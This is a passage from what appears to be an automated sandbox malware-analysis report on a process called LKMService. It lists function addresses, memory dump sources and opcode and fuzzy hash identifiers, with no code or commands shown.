                                                                                                                                                                                                                                            • Opcode ID: 254e86dfbdd3deeaa97066bae7f1ca63dccff27ef391a3e6780014a1b6b77fc2
                                                                                                                                                                                                                                            • Instruction ID: e8e037eb4573dce0021a9077277513cfccb101c1eb96277eaca838a40eb57077
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 254e86dfbdd3deeaa97066bae7f1ca63dccff27ef391a3e6780014a1b6b77fc2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAF0C873E0120997DF159664D8559EFBBBBAB84310F058825D412FB740DEB05A0A97E2
                                                                                                                                                                                                                                            Function 058B64D8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 65a6022e1b5b56a3bc724819b1003715feaf12cff10f1628381626fa6f79efbd
                                                                                                                                                                                                                                            • Instruction ID: bea69705b5c3ce48796a53d3df5a03eb9dac8757fa520514470d79eb2a2463cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65a6022e1b5b56a3bc724819b1003715feaf12cff10f1628381626fa6f79efbd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01018432C1464A9BCB009BA4D8004DEBB759FC7320F164611D1407B150E770259ACBA2
                                                                                                                                                                                                                                            Function 058B6B88 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a513b248b82bf3f5475345e3f49ab43e181f4108ffcb1e8a6d9f6ad01b1567bb
                                                                                                                                                                                                                                            • Instruction ID: deeb9953d97db04e6293e7807b9edcbb542dc7f3795a75fbe1f54ab9f3d3c243
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a513b248b82bf3f5475345e3f49ab43e181f4108ffcb1e8a6d9f6ad01b1567bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9601AD32D1161AAACB009BB9DC448DDBB76EFC6310B160712E110B7191EB71265AC7A2
                                                                                                                                                                                                                                            Function 058B92B9 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 20f3f5a15b03cf8c4460961bc3d24668ab391fdcc85c7b762b90ae3959335a8e
                                                                                                                                                                                                                                            • Instruction ID: e0ebae48623cd2e20cacfd1cc38bbc658b9a0ca174f4e7e8fef9907402a489e5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20f3f5a15b03cf8c4460961bc3d24668ab391fdcc85c7b762b90ae3959335a8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF0283290010AA7CB10AB74C8549EFBFBA9F84310F008525D512B7380DF74290AC7F2
                                                                                                                                                                                                                                            Function 058BA28D Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bb1c53f87540b8f28c30ff7ca7fc262db5a45f655d44b3c159dc7690d29be097
                                                                                                                                                                                                                                            • Instruction ID: fa5dbff0652235068486d088f78eb26798b8997054e7e71528030a47276c9ca7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb1c53f87540b8f28c30ff7ca7fc262db5a45f655d44b3c159dc7690d29be097
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9F08B36718210CFDF4AD638B0501FD77D1AAC462178481A2CD4AEB389DB340D0A87E5
                                                                                                                                                                                                                                            Function 058B7C28 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bd1639e29de5824695840322e3d279774fe7552b5f7773706f5171adf0396dc2
                                                                                                                                                                                                                                            • Instruction ID: cb4054304e33046abca029e56c8c653c4267349e828b2687b88d8264ef6dc72b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd1639e29de5824695840322e3d279774fe7552b5f7773706f5171adf0396dc2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B016D32E1060E97CF00DBB9D8014DEF7B6EFC9710F218726D61177254EBB1259A8BA1
                                                                                                                                                                                                                                            Function 058BCE60 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cee5e0600869b5a587c10489a07c4840d0d3394d4025af0c5ceab57d7832f350
                                                                                                                                                                                                                                            • Instruction ID: 74cf8e87c51f3aa751ab189d765d1dd8dff5a191e39ba95b97820a4b8410982b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cee5e0600869b5a587c10489a07c4840d0d3394d4025af0c5ceab57d7832f350
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78F0C273A1115AA7DF14DB64C8559EFBABA5F84310F058525E803AB340EFB4590A87E2
                                                                                                                                                                                                                                            Function 058B8901 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f224d0de13e862d111536569497b2af880976653ec58e12d7a9cee1c7a5c9955
                                                                                                                                                                                                                                            • Instruction ID: 11310c3b34611cdee279dbca3a792fcb12da4a7c54148686d3e1417d2a329117
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f224d0de13e862d111536569497b2af880976653ec58e12d7a9cee1c7a5c9955
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF06231911109EBDF149A70D86AAEFBFBA9B44305F05892AE802BB241DE715906CAD2
                                                                                                                                                                                                                                            Function 058B8388 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2fd0aa5dbc57e504f6d38a6561b01090fccdd8f1eefe4fc4fa534eab5e38b9c7
                                                                                                                                                                                                                                            • Instruction ID: a338bd1de25991612ea6a81c5d1fe01bebe277d80da93b022e109ec6992a76a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd0aa5dbc57e504f6d38a6561b01090fccdd8f1eefe4fc4fa534eab5e38b9c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4F0C23291010AA7DB159B64C8559EFBFEA9F44310F158925D912BB340DFB4590687E2
                                                                                                                                                                                                                                            Function 058B8310 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1cd5b167d36888482ca80a39f2acdce2a5510d4d73c99400a8e71d4d38976c89
                                                                                                                                                                                                                                            • Instruction ID: 172399fcf6a42ebd2dd99fc02e2d1789e0a6a12db3bac1482e3e20f3d9a3c403
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cd5b167d36888482ca80a39f2acdce2a5510d4d73c99400a8e71d4d38976c89
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D01FB32D1061E97CF049BA9D8404DEF7B6EFCA310F158726D61177250EB71259A8BA1
                                                                                                                                                                                                                                            Function 058B8E89 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 347988e352e4e90a3f331f3e1fc48aaf0fc9742188665d895f6e4a6ffc452fa7
                                                                                                                                                                                                                                            • Instruction ID: cc0661613d026d9acc8ae7662c2b384f4ad48b820e98d606b2e33f9c8725c148
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 347988e352e4e90a3f331f3e1fc48aaf0fc9742188665d895f6e4a6ffc452fa7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF04632A1014A97DB049B74C8649EFBFFF9F84300F014429D802AB340DFB0690687E1
                                                                                                                                                                                                                                            Function 058B8E10 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 27a339ceb0acd9359be5dc0b7103f5cc6f11377914ff2e2c012fb89164403aac
                                                                                                                                                                                                                                            • Instruction ID: 812da6ceb10d8775f5f21d8aa7478c698f48ac03b5d027deb3367114781ac25d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27a339ceb0acd9359be5dc0b7103f5cc6f11377914ff2e2c012fb89164403aac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1001FB32D1061E97CB049BA9D8404DEF7B6EFCA310F158726D611B7250EB71259A8BA1
                                                                                                                                                                                                                                            Function 058B7AD7 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3722776da5e1b3cbc1f884048b877488783f53d5d94be451d31aebf1926aaccc
                                                                                                                                                                                                                                            • Instruction ID: 97a628f298f0e4d205339e8f6bec46f776b8bc0e4aa55216b3dbe386ab018e2b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3722776da5e1b3cbc1f884048b877488783f53d5d94be451d31aebf1926aaccc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6001F471B1822DCEE754CAA888405EDB77BEBC52187169166E90ADB394C6609E028751
                                                                                                                                                                                                                                            Function 058B8888 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1f38507f0685731a75d85d18f935cde80fb8f51c9b2dd88ebb7889313a6e5284
                                                                                                                                                                                                                                            • Instruction ID: 5c2b194ed073ae579a2f7580cef7b36abf473505a08dc39827e1b500d77b62dd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f38507f0685731a75d85d18f935cde80fb8f51c9b2dd88ebb7889313a6e5284
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5F08C32D1060F96DF009BAAC8014EEFBB6EFCA320F255B11D61177250EB71219E8BA1
                                                                                                                                                                                                                                            Function 058B3339 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2d8769b3ea4c7cbe0c049216acb0a205b256cda0e87e7291b0563090c518b313
                                                                                                                                                                                                                                            • Instruction ID: 44992a83d124518a4cee8f38538d72a530fd8dcd4a03611aae1dc846bf4e148a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8769b3ea4c7cbe0c049216acb0a205b256cda0e87e7291b0563090c518b313
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF02831E1020A87DB05DF74C8555EFBBB69F48311F04892AD402EB340DEB89C0787C1
                                                                                                                                                                                                                                            Function 058B424B Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 45054e0ab1c7259008de87ab4fb939e7df9554829e0430340df61273c856623a
                                                                                                                                                                                                                                            • Instruction ID: a450f3f4246dec0093a7cf4211f0c4789a9b5c2b7918c33b0530535d109a4a35
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45054e0ab1c7259008de87ab4fb939e7df9554829e0430340df61273c856623a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41F04632E102098BDF08DB70C8519EFBBF69F80300F05852AD902EB340DEB50A0E97D1
                                                                                                                                                                                                                                            Function 058BB8B8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6e46fb12b9968f678ac5bbd122c8bd417e220325a231a204657082f777126c49
                                                                                                                                                                                                                                            • Instruction ID: 5bdfabae84fbc5065ec00976650fd29f2d2feffb02e8b8619bcdbcda61acd5e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e46fb12b9968f678ac5bbd122c8bd417e220325a231a204657082f777126c49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF02472A101486BDB06A73888646EF7FAA9F89300F018529D952A7340EEB41807A7E1
                                                                                                                                                                                                                                            Function 058B4EA8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e37a3eaf8ae09f8d966b91b9e9b0b89f61e94eb9a906edf028521458321fc29f
                                                                                                                                                                                                                                            • Instruction ID: a84817e5985e3b0c0d1ae36238ec16d10934fcd26b9c18a5893c9a3a5f25cb41
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e37a3eaf8ae09f8d966b91b9e9b0b89f61e94eb9a906edf028521458321fc29f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEF0F672D102099BDF059B70C8559EFBBFA9F45310F114825D912AB340DFB019069BD1
                                                                                                                                                                                                                                            Function 058B5640 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ba13ad05a85c00fdef46434bf50e6a56238145835c5d36f157afb4c13090fe41
                                                                                                                                                                                                                                            • Instruction ID: 53c0b5a0c7e3149e79f83ba2395cc98d8fbc5773d43a523c95184234648e4e3a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba13ad05a85c00fdef46434bf50e6a56238145835c5d36f157afb4c13090fe41
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32F0C232A1025ADBDB159B64C8659EFBBB6AF45305F11482AD802EB340EFB059068BC1
                                                                                                                                                                                                                                            Function 0151D1C4 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4561501132.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_151d000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ccbd4fe9411f610c934fefa4c9514ce2a9b2375a4b420b7822a7b606d815911c
                                                                                                                                                                                                                                            • Instruction ID: c3f131e842158cb2e465f564645dba0c3a95fa588ef087e26004555b913fba96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccbd4fe9411f610c934fefa4c9514ce2a9b2375a4b420b7822a7b606d815911c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF0C271404344AEF7118E19DC88BA6FFA8FB41734F18C05AED180E28AC278A844CA71
                                                                                                                                                                                                                                            Function 058BCDF0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0b2f999e68ff377cf013eb006c01875f37733b63be611e8789d20c563687766f
                                                                                                                                                                                                                                            • Instruction ID: 4cd11d50c364cad34fd23910a3b4a515577a549fc34dcd446e030fee698946fb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b2f999e68ff377cf013eb006c01875f37733b63be611e8789d20c563687766f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F03732D1060EA6DF00DBA9D8004CDFBB6EFCA320F254B11E20177160EB71259A86A1
                                                                                                                                                                                                                                            Function 058B64E8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 63b8c41161b944ea6220670cdd724a8e4e851cadf052783cd82274969f860552
                                                                                                                                                                                                                                            • Instruction ID: 647a287294ca5e6476716914c6ffd5fa6ff7c90fb11bc5640fc1f56944957f10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63b8c41161b944ea6220670cdd724a8e4e851cadf052783cd82274969f860552
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BF04F32D1060F96DB10DBA9C8404DEFBB6EFCA320F554711D21177150EB70219ACBA1
                                                                                                                                                                                                                                            Function 058B6B98 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4469ee153d32dae34cc34844c5ce05e31583ed82d1fb787507b9017472265e8a
                                                                                                                                                                                                                                            • Instruction ID: 10094f3923881cac52ec633670edbea0114236067bf66f28335224dfdb8c56d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4469ee153d32dae34cc34844c5ce05e31583ed82d1fb787507b9017472265e8a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F04932D2061EA6CB00DBA9DC448DDF7B6EFCA310F264B11E21077250EB71255AC792
                                                                                                                                                                                                                                            Function 058B9F50 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 60be5e0821f0cadc5ea5c27338f63703ff36a6767b9b8af841623a12167febbd
                                                                                                                                                                                                                                            • Instruction ID: 13274704d366652208abcbd2f45bee599a72d0f4179201e48af1d0e18b21e9ac
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60be5e0821f0cadc5ea5c27338f63703ff36a6767b9b8af841623a12167febbd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBF0B4366082446FC755CA19D840DAA7FABEFC5630718C15BF848CB306CA30DC45C7A1
                                                                                                                                                                                                                                            Function 058B7A2A Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ae05f60ce07265c93a560e61009ea73f1c108d2a169c189ce4053e2e43b79f36
                                                                                                                                                                                                                                            • Instruction ID: a09c937e215e38737ea569eac3bb2e5983decd02ad9b95cf0282609fec86df72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae05f60ce07265c93a560e61009ea73f1c108d2a169c189ce4053e2e43b79f36
